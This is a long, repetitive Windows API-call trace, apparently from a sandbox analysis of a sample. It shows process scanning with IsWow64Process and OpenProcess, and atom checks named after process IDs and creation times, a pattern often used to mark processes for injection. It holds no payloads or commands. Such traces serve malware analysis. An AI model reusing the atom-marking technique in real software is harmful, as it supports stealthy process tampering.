	[0143.474] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.474] CloseHandle (hObject=0x2dc) returned 1
	[0143.474] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.474] CloseHandle (hObject=0x2dc) returned 1
	[0143.474] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.474] CloseHandle (hObject=0x2dc) returned 1
	[0143.475] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.475] CloseHandle (hObject=0x2dc) returned 1
	[0143.475] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.475] CloseHandle (hObject=0x2dc) returned 1
	[0143.475] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0143.476] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0143.476] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0143.476] wsprintfA (in: param_1=0x39938f8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0143.476] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0143.476] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0143.477] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0143.477] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0143.477] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0143.477] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0143.477] CloseHandle (hObject=0x2dc) returned 1
	[0143.477] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0143.477] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.477] CloseHandle (hObject=0x2dc) returned 1
	[0143.478] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.478] CloseHandle (hObject=0x2dc) returned 1
	[0143.478] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.478] CloseHandle (hObject=0x2dc) returned 1
	[0143.478] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.478] CloseHandle (hObject=0x2dc) returned 1
	[0143.478] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.478] CloseHandle (hObject=0x2dc) returned 1
	[0143.511] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.511] CloseHandle (hObject=0x2dc) returned 1
	[0143.511] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.511] CloseHandle (hObject=0x2dc) returned 1
	[0143.511] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.512] CloseHandle (hObject=0x2dc) returned 1
	[0143.512] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.512] CloseHandle (hObject=0x2dc) returned 1
	[0143.512] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.512] CloseHandle (hObject=0x2dc) returned 1
	[0143.512] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.512] CloseHandle (hObject=0x2dc) returned 1
	[0143.513] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.513] CloseHandle (hObject=0x2dc) returned 1
	[0143.513] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.513] CloseHandle (hObject=0x2dc) returned 1
	[0143.513] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.513] CloseHandle (hObject=0x2dc) returned 1
	[0143.513] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.513] CloseHandle (hObject=0x2dc) returned 1
	[0143.514] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.514] CloseHandle (hObject=0x2dc) returned 1
	[0143.514] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.514] CloseHandle (hObject=0x2dc) returned 1
	[0143.514] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.514] CloseHandle (hObject=0x2dc) returned 1
	[0143.514] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.514] CloseHandle (hObject=0x2dc) returned 1
	[0143.515] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.515] CloseHandle (hObject=0x2dc) returned 1
	[0143.515] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.515] CloseHandle (hObject=0x2dc) returned 1
	[0143.515] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.515] CloseHandle (hObject=0x2dc) returned 1
	[0143.515] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.516] CloseHandle (hObject=0x2dc) returned 1
	[0143.516] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.516] CloseHandle (hObject=0x2dc) returned 1
	[0143.516] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.516] CloseHandle (hObject=0x2dc) returned 1
	[0143.516] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.516] CloseHandle (hObject=0x2dc) returned 1
	[0143.517] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.517] CloseHandle (hObject=0x2dc) returned 1
	[0143.517] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.517] CloseHandle (hObject=0x2dc) returned 1
	[0143.517] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.517] CloseHandle (hObject=0x2dc) returned 1
	[0143.517] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.517] CloseHandle (hObject=0x2dc) returned 1
	[0143.518] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.518] CloseHandle (hObject=0x2dc) returned 1
	[0143.518] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.518] CloseHandle (hObject=0x2dc) returned 1
	[0143.518] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.518] CloseHandle (hObject=0x2dc) returned 1
	[0143.518] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.518] CloseHandle (hObject=0x2dc) returned 1
	[0143.519] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.519] CloseHandle (hObject=0x2dc) returned 1
	[0143.519] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0143.519] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0143.519] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0143.520] wsprintfA (in: param_1=0x3993380, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0143.520] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0143.520] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0143.520] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0143.521] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0143.521] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0143.521] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0143.521] CloseHandle (hObject=0x2dc) returned 1
	[0143.521] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0143.521] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.521] CloseHandle (hObject=0x2dc) returned 1
	[0143.521] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.521] CloseHandle (hObject=0x2dc) returned 1
	[0143.522] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.522] CloseHandle (hObject=0x2dc) returned 1
	[0143.522] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.522] CloseHandle (hObject=0x2dc) returned 1
	[0143.522] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.522] CloseHandle (hObject=0x2dc) returned 1
	[0143.556] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.556] CloseHandle (hObject=0x2dc) returned 1
	[0143.556] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.556] CloseHandle (hObject=0x2dc) returned 1
	[0143.556] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.556] CloseHandle (hObject=0x2dc) returned 1
	[0143.556] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.556] CloseHandle (hObject=0x2dc) returned 1
	[0143.557] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.557] CloseHandle (hObject=0x2dc) returned 1
	[0143.557] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.557] CloseHandle (hObject=0x2dc) returned 1
	[0143.557] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.557] CloseHandle (hObject=0x2dc) returned 1
	[0143.557] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.557] CloseHandle (hObject=0x2dc) returned 1
	[0143.558] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.558] CloseHandle (hObject=0x2dc) returned 1
	[0143.558] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.558] CloseHandle (hObject=0x2dc) returned 1
	[0143.558] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.558] CloseHandle (hObject=0x2dc) returned 1
	[0143.558] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.558] CloseHandle (hObject=0x2dc) returned 1
	[0143.559] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.559] CloseHandle (hObject=0x2dc) returned 1
	[0143.559] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.559] CloseHandle (hObject=0x2dc) returned 1
	[0143.559] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.559] CloseHandle (hObject=0x2dc) returned 1
	[0143.559] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.559] CloseHandle (hObject=0x2dc) returned 1
	[0143.560] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.560] CloseHandle (hObject=0x2dc) returned 1
	[0143.560] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.560] CloseHandle (hObject=0x2dc) returned 1
	[0143.560] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.560] CloseHandle (hObject=0x2dc) returned 1
	[0143.561] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.561] CloseHandle (hObject=0x2dc) returned 1
	[0143.561] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.561] CloseHandle (hObject=0x2dc) returned 1
	[0143.561] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.561] CloseHandle (hObject=0x2dc) returned 1
	[0143.561] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.561] CloseHandle (hObject=0x2dc) returned 1
	[0143.562] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.562] CloseHandle (hObject=0x2dc) returned 1
	[0143.562] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.562] CloseHandle (hObject=0x2dc) returned 1
	[0143.562] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.562] CloseHandle (hObject=0x2dc) returned 1
	[0143.562] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.562] CloseHandle (hObject=0x2dc) returned 1
	[0143.563] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.563] CloseHandle (hObject=0x2dc) returned 1
	[0143.563] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.563] CloseHandle (hObject=0x2dc) returned 1
	[0143.563] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.563] CloseHandle (hObject=0x2dc) returned 1
	[0143.564] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0143.564] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0143.564] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0143.564] wsprintfA (in: param_1=0x39938f8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0143.564] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0143.565] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0143.565] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0143.565] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0143.565] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0143.565] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0143.565] CloseHandle (hObject=0x2dc) returned 1
	[0143.565] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0143.565] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.566] CloseHandle (hObject=0x2dc) returned 1
	[0143.566] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.566] CloseHandle (hObject=0x2dc) returned 1
	[0143.566] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.566] CloseHandle (hObject=0x2dc) returned 1
	[0143.566] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.566] CloseHandle (hObject=0x2dc) returned 1
	[0143.567] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.567] CloseHandle (hObject=0x2dc) returned 1
	[0143.599] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.599] CloseHandle (hObject=0x2dc) returned 1
	[0143.599] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.599] CloseHandle (hObject=0x2dc) returned 1
	[0143.600] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.600] CloseHandle (hObject=0x2dc) returned 1
	[0143.600] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.600] CloseHandle (hObject=0x2dc) returned 1
	[0143.600] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.600] CloseHandle (hObject=0x2dc) returned 1
	[0143.601] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.601] CloseHandle (hObject=0x2dc) returned 1
	[0143.601] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.601] CloseHandle (hObject=0x2dc) returned 1
	[0143.601] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.601] CloseHandle (hObject=0x2dc) returned 1
	[0143.601] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.601] CloseHandle (hObject=0x2dc) returned 1
	[0143.602] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.602] CloseHandle (hObject=0x2dc) returned 1
	[0143.602] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.602] CloseHandle (hObject=0x2dc) returned 1
	[0143.602] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.602] CloseHandle (hObject=0x2dc) returned 1
	[0143.602] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.602] CloseHandle (hObject=0x2dc) returned 1
	[0143.603] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.603] CloseHandle (hObject=0x2dc) returned 1
	[0143.603] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.603] CloseHandle (hObject=0x2dc) returned 1
	[0143.603] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.603] CloseHandle (hObject=0x2dc) returned 1
	[0143.603] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.603] CloseHandle (hObject=0x2dc) returned 1
	[0143.604] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.604] CloseHandle (hObject=0x2dc) returned 1
	[0143.604] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.604] CloseHandle (hObject=0x2dc) returned 1
	[0143.604] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.604] CloseHandle (hObject=0x2dc) returned 1
	[0143.604] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.605] CloseHandle (hObject=0x2dc) returned 1
	[0143.605] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.605] CloseHandle (hObject=0x2dc) returned 1
	[0143.605] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.605] CloseHandle (hObject=0x2dc) returned 1
	[0143.605] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.605] CloseHandle (hObject=0x2dc) returned 1
	[0143.606] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.606] CloseHandle (hObject=0x2dc) returned 1
	[0143.606] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.606] CloseHandle (hObject=0x2dc) returned 1
	[0143.606] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.606] CloseHandle (hObject=0x2dc) returned 1
	[0143.606] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.606] CloseHandle (hObject=0x2dc) returned 1
	[0143.607] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.607] CloseHandle (hObject=0x2dc) returned 1
	[0143.607] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.607] CloseHandle (hObject=0x2dc) returned 1
	[0143.607] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0143.607] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0143.607] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0143.608] wsprintfA (in: param_1=0x3993380, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0143.608] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0143.608] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0143.608] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0143.609] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0143.609] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0143.609] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0143.609] CloseHandle (hObject=0x2dc) returned 1
	[0143.609] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0143.609] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.609] CloseHandle (hObject=0x2dc) returned 1
	[0143.609] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.609] CloseHandle (hObject=0x2dc) returned 1
	[0143.610] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.610] CloseHandle (hObject=0x2dc) returned 1
	[0143.610] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.610] CloseHandle (hObject=0x2dc) returned 1
	[0143.610] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.610] CloseHandle (hObject=0x2dc) returned 1
	[0143.648] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.648] CloseHandle (hObject=0x2dc) returned 1
	[0143.648] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.648] CloseHandle (hObject=0x2dc) returned 1
	[0143.648] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.648] CloseHandle (hObject=0x2dc) returned 1
	[0143.648] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.648] CloseHandle (hObject=0x2dc) returned 1
	[0143.649] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.649] CloseHandle (hObject=0x2dc) returned 1
	[0143.649] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.649] CloseHandle (hObject=0x2dc) returned 1
	[0143.649] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.649] CloseHandle (hObject=0x2dc) returned 1
	[0143.649] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.649] CloseHandle (hObject=0x2dc) returned 1
	[0143.650] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.650] CloseHandle (hObject=0x2dc) returned 1
	[0143.650] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.650] CloseHandle (hObject=0x2dc) returned 1
	[0143.650] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.650] CloseHandle (hObject=0x2dc) returned 1
	[0143.650] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.650] CloseHandle (hObject=0x2dc) returned 1
	[0143.651] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.651] CloseHandle (hObject=0x2dc) returned 1
	[0143.651] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.651] CloseHandle (hObject=0x2dc) returned 1
	[0143.651] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.651] CloseHandle (hObject=0x2dc) returned 1
	[0143.651] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.651] CloseHandle (hObject=0x2dc) returned 1
	[0143.652] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.652] CloseHandle (hObject=0x2dc) returned 1
